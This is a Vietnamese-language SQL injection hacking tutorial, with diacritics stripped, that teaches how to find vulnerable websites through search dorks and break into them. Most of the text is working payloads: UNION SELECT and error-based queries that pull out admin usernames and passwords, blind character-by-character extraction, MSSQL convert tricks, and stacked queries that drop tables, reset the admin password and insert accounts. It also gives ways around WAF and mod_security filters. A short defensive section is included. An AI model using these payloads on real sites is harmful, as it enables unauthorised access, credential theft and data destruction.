Bi 1: Khi nim v kin thc cn bit

1. Khi nim: SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin hin nay, theo thng k th khong 75% hacker s dng k thut ny chim quyn iu khin ca h thng. Bng cch inject cc m SQL query/command vo input trc khi chuyn cho ng dng web x l, bn c th login m khng cn username v password, remote execution, dump data v ly root ca SQL server. Cng c dng tn cng l mt trnh duyt web bt k, chng hn nh Internet Explorer, Netscape, Lynx, Firefox,... 2. Kin thc cn bit: -du nhy n ('): du ny trong ngn ng SQL dng "gi" chui. Ta thng thm n vo sau tham s kiu s trn chui truy vn kim tra c li hay khng. Nguyn nhn l do khng kim tra kiu d liu. - du thng (#) v du (): cc du ny nh du ch thch, ngha l nhng k t ng sau mt trong hai du ny trn cng mt dng s c xem l ch thch c b qua khi thc hin truy vn. - du ( ; ): dng kt thc mt truy vn v tt nhin sau n l bt u mt truy vn khc. i khi ta dng union ni hai cu truy vn. kin thc database (CSDL) v ngn ng thit k website (PHP, ASP). MsAccess: thng dnh cho cc website tin tc quy m nh, s dng ngn ng ASP thit k. MSSQL: dng cho website c quy m ln, s dng ngn ng ASP, ASPX (ASP.Net) thit k. MySQL: tt c cc website c th dng, s dng ngn ng PHP thit k (MySQL v PHP l 2 anh em song sinh , chng lun i km vi nhau ). Oracle: tng t nh MySQL Db2: dng cho cc h thng website ngn hng cc h thng cn ch bo mt rt cao! Cc bc thc hin: Bnh thng hack 1 site li SQL injection bao gm cc bc : B 1 : Check B 2 : Order By (m s ct lin quan trong cu query m URL ca site chy ) B3 : Union Select a) Bn c th search cc trang web cho php submit data bt k mt search-engine no trn mng, chng hn nh cc trang login, search, feedback hoc qua cch truyn tham s (Dork) VD: chitiet.php?id=21 , detail.asp?id=6,... b) Khi tm kim c mc tiu cn tn cng chng ta cn phi xc nh c h qun tr CSDL ca website ( y l bc quan trng) bng cch nhn tng th website, ngn ng thit k, OS ca server qua qu trnh thm d. y ti xin thng k cc database thng gp i cng vi ngn ng thit k website. c) khi xc nh c mc tiu th cc bn cn kim tra cc li xem c kh nng tn cng da vo n c

khng. Cc k thut khai thc li nh sau: -Vi cc tham s c truyn vo VD: index.php?id=21 , index.asp?id=6,.. th chng ta ch cn thm cc k t du nhy n ('), du nhy kp ("), phn trm 27 (%27), 00 phn trm (00%) vo sau id kim tra nu n hin ra li hoc khng hin ra 1 ci g (khc hon ton vi lc ban u th 90% bn c kh nng khai thc c li ny - S trnh by r phn sau). -Vi cc submit thng tin nh tm kim, login, contact, request,.. cc bn cng lm tng t. V D: http://ww.site.com/index.php?id=1 (gi s y l site b li SQL injection) c php trng thi http://ww.site.com/index.php?id=1' li -------http://ww.site.com/index.php?id=1" li -------http://ww.site.com/index.php?id=1%27 li -------http://ww.site.com/index.php?id=1 and 1=0 li http://ww.site.com/index.php?id=1 and 1=1 khng li Share 1 s kinh nghim cho ae: 1. Nu bn check li SQL Inj 1 website m bn khng thy li hin ra th ng nn b qua chng v n c th b admin lm cho n i. 2. Nu khng ra s p khi Union th hy view Scoure n ln v tm, c th n trong . 3. Thay v thm ' vo sau id kim tra th cc bn c th s dng k thut s dng cc php ton: VD: and 1=1 hin ra site , and 1=0 hin ra site bo li =>> Site b dnh sql inj s dng cc php ton kiu true fales: VD: 2>3 ; 2<3 1--1 BETWEEN 1 AND 3 'b' BETWEEN 'a' AND 'c' 2 IN (0,1,2) CASA WHEN 1>0 THEN 1 END ' uuu' = 'uuu' ISNULL(NULL) ISNULL(COT(0)) 1 IS NOT NULL NULL IS NULL Nu tham s (id) ca trang hin ti l 3, tham s trang sau l 2, nu ta dng 3-1 , kt qu tr v l ni dung ca trang c id=2 th 99% l site ny dnh li SQLi.

Bi 2
Order by c s dng lm g : -Lm tit kim thi gian attack. -N c s dng tnh s field ,column c trong CSDL SQL. C php: order by xx (vi xx l s nguyn, hiu qu nn order by 100 u tin xc nh ta i ng hng) VD: http://ww.site.com/index.php?id=1 order by 100

Li nhn bit Error: Unknown column '100' in 'order clause' -------------You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 site c hin tng khc l (da vo kinh nghim) Nhng cng c site li phi thm du nhy v du -- hoc -- - hoc -- a hoc /* mi order by c -- : Hiu n gin l trnh b ghi log - : Bin on ng sau du - thnh ch thch. Sau y l cc trng hp thng dng Order by : TH c php V d TH1: order by http://ww.site.com/index.php?id=1 order by 100 TH2: ' order by http://ww.site.com/index.php?id=1 ' order by 100 TH3: 'order by http://ww.site.com/index.php?id=1 'order by 100 TH4: chuyn sang union select http://ww.site.com/index.php?id=1 union select 1 V D: http://ww.site.com/index.php?id=1 order by 1-- khng li http://ww.site.com/index.php?id=1 order by 2-- khng li http://ww.site.com/index.php?id=1 order by 3-- khng li http://ww.site.com/index.php?id=1 order by 4-- li vy ta thy site c 3 ct li (v order by 4 ct --> hin li)

Bi 3
Khai thc: Sau khi xc nh site sqli + check sqli +h qun tr SCDL l g (ph bin MsAccess,MSSQL,MySQL, Oracle), th chng ta bt tay vo cng vic khai thc chng. (Mi h qun tr CSDL khc nhau th c cch khai thc gn nh l khc nhau).Cc bn phi lm r vn trn sau ny d dng cho vic khai thc li. Cch khai thc li ca tng ng dng s dng CSDL trn s c trnh by di: (tuy nhn theo kinh cc newbie c gng tp trung MQJ v n l ph bin) i vi CSDL MyQSL: Li tr v thng xut hin cc du hiu sau: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 Ring bn ny cc bn cn ch vic u tin ta khai tc l kim version (phin bn) ca n hin ti. K thut khai thc bn ny c thc hin ln lt nh sau: u tin ta tin hnh xc nh s ct trong table hin ti bng cch s dng Order by n (VD: 6) Tip theo ta s dng UNION SELECT [ s ct tm c , c phn cch bng du phy]-http://demo.com.vn/index.php?id=-1 Union Select 1,2,3,4,5,6-- n s hin ra nhng con s nu khng hin s: +viewsource +Xem file nh b li thy s +Thay s bng null (vd id=-188 th thay id=null UNION....) +Thay cc column(field) bng null (vd :UNION SELECT null,null,....) +Bypass filter (mod_security)( TH ny mnh s i su phn sau) +TH hin ra thng bo th ny: The used SELECT statements have a different number of columns Union select nh sau: id=1+and+1=0+UNION SELECT+1,2... Hoc dng error base: And (Select 1 From(Select Count( * ),Concat(CHAR (124),(Select concat_ws(0x7c,version(),database(),user())),floor (rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)-- and extractvalue(rand(),concat(0x3a,version(),0x3a,use r()))-or 1 group by concat_ws(0x7c,version(),database(),current_user,f loor(rand(0)*2)) having min(0) or 1-Hoc dng blind: and substring(version(),1,1)=5 Tu thi c m bin ho chng

T d n hin ra s 3. Cng vic tip theo ca ta l xc nh version (Cng vic quan trng nht) http://demo.com.vn/index.php?id=-1 Union Select 1,2,version(),4,5,6-Nu kt qu tr v : >>>>Phin bn ln hn hoc bng 4 v nh hn 5: Khai thc nh li ca CSDL MsAccess (Hack on) >>>>Phin bn ln hn 5 th s dng cch di y. Oke, ta xc nh c phin bn l ln hn 5. ta tin hnh truy vn. http://demo.com.vn/index.php?id=-1 Union Select 1,2,table_name,4,5,6 From Information_schema.tables-hoc http://demo.com.vn/index.php?id=-1 Union Select 1,2,CONVERT(group_concat(table_name) USING latin1),4,5,6 From Information_schema.tables-hoc http://demo.com.vn/index.php?id=-1 Union Select 1,2,unhex(hex(group_concat(table_name))),4,5,6 From Information_schema.tables-Tu thi c m bin ho chng. n s tr v gi tr u tin l: CHARACTER_SETS, gp tt c cc table li cho d tm kim th cc bn dng hm Group_concat() Hoc limit. http://demo.com.vn/index.php?id=-1 Union Select 1,2,group_concat(table_name),4,5,6 From Information_schema.tables-http://demo.com.vn/index.php?id=-1 Union Select 1,2,table_name,4,5,6 From Information_schema.tables limit 17,1-http://demo.com.vn/index.php?id=-1 Union Select 1,2,table_name,4,5,6 From Information_schema.tables limit n,1-Chng ta khng quan tm lm nhng table dng nh ny: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,USER_PRIVILEGES,VIEWS,admins v ch l nhng table ca h thng thi, quan trng l xc nh c table cha admin trong m hn n pha trn. VD ta tm c table cha thng tin ca admin l admins. Ta tin hnh chuyn chui 'admin' sang dng hex d khai thc vd chuyn sang l ? th ta tin hnh tm cc column trong table admins bng cch http://demo.com.vn/index.php?id=-1 Union Select 1,2,group_concat(column_name),4,5,6 From Information_schema.columns where table_name=(0x?)-http://demo.com.vn/index.php?id=-1 Union Select 1,2,CONVERT(group_concat(column_name) USING latin1),4,5,6 From Information_schema.columns where table_name=(0x?)-http://demo.com.vn/index.php?id=-1 Union Select 1,2,unhex(hex(group_concat(columns_name))),4,5,6 From Information_schema.Columns where table_name=(0x?)-sau cng vic ny ta xc nh c 2 cloumn quan trng nht , VD l username v password. Ta tin hnh ly thng tin. Bng cch http://demo.com.vn/index.php?id=-1 Union Select 1,2,concat(username,0x2f,password)4,5,6 From admins-0x2f: l dng hex ca k t /

i vi CSDL MSACCESS: l loi kh ph nht trong cc site dnh SQLInj , l do khng phi do n bo mt, m l do mc nh n truy cp file mdb khng bng quyn admin, do table msysobjects cha cc table ca n ta khng th ng c. ng vo CSDL ny l phi blind hack (Hack on). li tr v ca loi ny thng xut hin cc du hiu sau: Jet database, ODBC Microsoft Access Driver. Khai thc loai ny nh sau: u tin ta s dng lnh UNION SELECT 1 FROM [Table_name] [Table_name]: L tn table bn on n s cha thng tin v Username v pasword ca Victim. VD: Admin, Admins, Account, Thanhvien, Quantri, User, Users,... VD: Bn khai thc: http://demo.com.vn/news.asp?id=72 Union select 1 from admin li tr v l: Microsoft OLE DB Provider for ODBC Drivers error '80040e37' [Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query 'admin'. Make sure it exists and that its name is spelled correctly. (Dch nm na l khng tn ti table 'admin' trong CSDL) ng nn tr, hy on tip http://demo.com.vn/news.asp?id=72 Union select 1 from admins Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match. /news.asp, line 16 (Dch nm na l: S ct khng cn bng khi s dng truy vn vi Union) n y chng ta bit table cha thng tin v victim l 'admns' n lc ny bn ch vic ngi m s ct trong table bng cch Union select 1,2,3,..,n from admins cc bn c m sao cho n khng bo li na m trn trang hin ra nhng con s. n lc ny bn li phi on column cha username v password ri thay th chng vo nhng con s hin ra sao cho khng hin ra li tc l bn on ng. VD: Bn m c n s 5 th k cn li, Con s hin ra l 2,3 v column cha tn ng nhp ca admin l username, column cha mt khu ca admin l password th bn s khai thchttp://demo.com.vn/news.asp?id=72 Union select 1,username,password,4,5 from admins

i vi CSDL MSSQL: Li tr v ca bn ny thng xt hin cc du hiu sau: Microsoft OLE DB Provider for ODBC Drivers ,ODBC SQL Server Driver, Gi tt l (li OLE DB) Cch khai thc bn ny s dng k thut "Magic convert". K thut ny c s dng nh sau: and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password Hoc

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('')))-sp_password Trong bng Information_schema.tables c cha tt c cc table trong CSDL (y l gt chn Asin ca bn ny ) -Nu tm ra c ci table_name u tin v d l table1 Check table tip theo ca n: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('table1','table2',..,'table n')))--sp_password c nh th cho n khi no n ra ci table_name cha thng tin admin vd:tbladmin,admin,user,tbuser.. Bc 2: Get column Tm c ci table_name cha thng tin admin ri,ta tin hnh get column_name gi s table1 cha thng tin v admin and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='table1'))--sp_password vd ta tm c column th 1 trong table1 l username Tip tc get cc column th 2 trong table1: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='table1' and column_name not in('username')))--sp_password Nu tm c username/password trong table1 th ta check pass ca n Bc 3: Check pass table_name l table1 column_name trong table1 l : username/password and 1=convert(int,(select top 1 username%2b'/'%2bpassword from table1))--sp_password

Bi 4
Blind SQL: Pht hin li "blind sql injection": - i vi MY SQL vesion 4 tr xung. - xc nh xem n c b dinh li blind sql injection ko ta hy th thm vo 1 iu kin ng .V d

nh: http://www.company.com/pressRelease.jsp?pressID=5 AND 1=1 nu ta vn c tr v v tr ca http://www.company.com/pressRelease.jsp?pressID=5 th c ngha l n dnh li Khai thc: VD:http://www.site.com/news.php?id=5 Ta tin hnh kim version bng cch s dng hm ct chui Substring() VD: Substring('mmdVBF',5,3) kt qu s l neo http://www.site.com/news.php?id=5 and substring(version(),1,1)=4 Trang s hin th bnh thng nu kt qu truy vn trn ng , nu vy phin bn ca Mysql ny l 4.xxx.x cn nu khng chng ta thay 4 thnh 5 kim tra tip http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 http://www.site.com/news.php?id=5 and (select 1)=1 nu site ti thng thng th subselects lm vic. sau chng ta s xem liu chng ta c th truy cp mysql.user http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 nu ti trang thng thng chng ta c th truy cp mysql.user v sau , chng ta c th ko mt s password usign load_file() function and OUTFILE. kim tra table v column: y l mt phn khi on: http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (s dng limit 0,1 truy vn y ca chng ta tr v 1 hng ca d liu, gy ra subselect tr v ch 1 hng, iu ny l rt quan trng.) sau nu trang ti bnh thng m khng c ni dung thiu, th table users exits. nu bn get FALSE (mt s iu cn thiu), hy thay i table_name cho n khi on ng by gi chng ta c table name l users, nbaay gi chng ta cn column name. ging nh tn bng, chng ta bt u on. Ging nh ti ni trc khi th cc tn gi thng thng cho cc ct. http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 nu trang ti bnh thng, chng ta bit rng tn ct l password (nu chng ta sai th th tn gi thng thng hoc ch on) y chng ta hp nht 1 ct password, sau tr v chui k t u tin (1,1) ly d liu t c s d liu chng ti tm thy ngi s dng bng, ct: username, password . v vy chng ta s get cc characters t . http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok ny y get k t u tin: user ,trong table users.that

substring y tr v character u tin v 1 character trong length. ascii() converts m 1 character vo gi tr ascii . v sau so snh n vi simbol ln hn sau >. v vy nu char ascii ln hn 80 sau , ti trang web bnh thng. (TRUE) chng ta tip tc c gng cho n khi chng ta nhn c sai. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

chng ta nhn c TRUE, gi incrementing http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE mt ln na, cao hn: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!! do , k t u tin trong tn username l char (99). S dng b chuyn i ascii, chng ta bit rng char (99) l ch 'c'. sau cho php kim tra cc character th hai. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Lu rng ti thay i, 1,1, 2,1 c c nhng characte th hai. (by gi n tr v characte th hai, 1 characte lenght) http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, trang ti bnh thng, cao hn. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, thp hn s lng. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, cao hn. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

Bi 5
Filter + Tng kt: - Khi query 1 s site chn cc hm union,select,convert...th khi query n tr v trang trng, lc ny ta thay i 1 s ch Hoa, thng xen k nhau: UniON, SeLECt... hoc conveter sang ascii - Khi query cng c 1 s site tr v trang trng, th ta nhn k trn site nha,k c title site.Nu ko thy ae view source s thy - 1 s query table_name khng hin ra , ta unhex(hex(group_concat(table_name)) - Khi query n tr v th ny Forbidden You don't have permission to access /news.php on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Hoc Not Acceptable An appropriate representation of the requested resource / could not be found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request Th ta dng /*! */ (VD: /*!union*/ hoc /*!select*/ hoc information_schema./*!tables*/..vv) -Nu query n ra th ny: 406 Not Acceptable This request is not acceptable Powered By LiteSpeed Web Server LiteSpeed Technologies is not responsible for administration and contents of this web site! Th cc bn cn t duy cht. VD: cc bn c th thay space = %0A (k t xung dng) ..vv 1 S truy vn khc -To 1 table_name: ;drop table kingnuscreate table thanggiangho (id int identity,kingnusvarchar(99999)) insert into kingnusselect table_name from information_schema.tables--sp_password

-Thay i pass admin: ly vd trn nu nh username :kingnus/pass:ceh ;UPDATE table1 SET password = 'ceh' WHERE username='kingnus'--Chn 1 record mi vo table ;INSERT INTO 'table1' ('ID', 'username', 'password', 'details') VALUES (99,'kingnus','ceh','Online')--Tm tt c cc table c lin quan nh: admin,user,member,account,login... and 1 = convert(int,(select top 1 table_name from information_schema.tables where table_name like '%admin%' or table_name like '%Member%' or table_name like '%User%' or table_name like '%account%' or table_name like '%login%'))--sp_password and 1 = convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('') and (table_name like '%25admin%25' or table_name like '%25Member%25' or table_name like '%25User%25' or table_name like '%25account%25' or table_name like '%25login%25')))--sp_password -Ly tt c cc table_name: ; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp%2btable_name%2b'/' from information_schema.tables select @temp as id into kingnusend-or 1=(select id from kingnus)-; drop table kingnus--Ly tt c cc column_name t 1 table_name: vd table_name : tbadmin ; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp%2bcolumn_name%2b'/' from information_schema.columns where table_name='tbadmin' select @temp as id into kingnus end-or 1=(select id from kingnus)-Quote: I. Cch v li: 1. Mi php.ini v set magic_quotes_gcp thnh On N s chn "\" trc (') c trong: -COOKIE -POST -GET

2. S dng hm addslashes() "gi" chui bng du "/" 3. S dng hm htmlspecialchars(), mysql_escape_string() ... m ho k t c bit trong cu truy vn 4. p kiu: - Ta bit id ca mt i tng (user, category, box, product ...) lun l kiu s nguyn, v vy ta dng: Quote: $id = (int)$_POST['id']; hoc $id = (int)$_GET['id']; Gii thch v v li : 3 cch u: Nu nhp vo abc' i , th n s hiu l mt chui ch khng phi l abc ri du ' ring Cch th 4: l nu nhp chui th n p thnh s tng ng, m s th . . .

Hng dn Bypass 1 s li thng gp:

Loi 403,406: khi ta order by thnh cng , nhng union select li xut hin nhng dng thng bo sau: Quote: 406 Not Acceptable This request is not acceptable Powered By LiteSpeed Web Server LiteSpeed Technologies is not responsible for administration and contents of this web site! Quote: Forbidden You don't have permission to access /htmls/recruitment_detail.php on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.vinaplast.com.vn Port 80 Quote: Not Acceptable An appropriate representation of the requested resource /detClientes.php could not be found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 vt qua c ci ny, th chng ta cn phi bypass n, nu bypass vt qua xem nh site ny 90% l xong vi mnh Sau y l mt s cch vt qua: Cch 1 : ty bin union select Ty bin y l cc bn iu chnh ch HOA, ch THNG, HOA THNG xen k nhau Cch 2: Thm comment /*!...*/ , /*!50000...*/ Cch 3: Dng encode URL, cch dng nh sau v d : ta encode union ,nhng ta ch encode 1 phn hoc tt c ch ci c trong union. ta ch vic HEX n v thm ng trc l %, ch l % ch ko phi 0x u nh Cch 4: l khi xut hin khong trng n s bo li, ta thay khong trng bng du +, v 1 s trng hp ta thay bng : %0A,%0B,%0C,%0D,%09,%20... Cch 5 : Kt hp 4 cch trn li vi nhau Cch 6: t ch Mo vt tm ra t kha b MOD_security: Khi bypass union select thnh cng th ti on get table_name. on get table_name chc chn cc bn s gp tr ngi v n tip tc thng bo li, do cch thc vot qua ci ny nh sau : Vi d site.com?tghmmd=1 order by 7-- - l ok. V Union select ta bypass v cho ra s 3 Quote: >>union select 1,2,3,4,5,6,7-- +Get table_name ta cha vi thay table_name vo lm g, m thm vo "from information_schema.tables" trc>> s thnh Quote: union select 1,2,3,4,5,6,7 from information_schema.tables-- Nu n bo li th hu ht bypass nh sau: Thay tables = /*!table*/=/*!50000tables*/ hoc from= /*!from*/=/*!50000from*/ Nu n ko bo li th ta i tip,v thm on where table_schema=database() -Nu li bo li th bypass nh sau Thay where=/*!where*/=/*!50000where*/ Hoc = bng like Ch ch ny, ci database() ,khi m tm version() m n chn() th ch ch ny ta dng tn ci database nh >>Khi thm xong m s column li l 3 vn hin ra l ta bypass ok ri. By h ch vic thay ci table_name vo s 3 na l ok. Nu li th tip tc bypass nh trn table_name = /*!table_name*/ = /*!50000table_name*/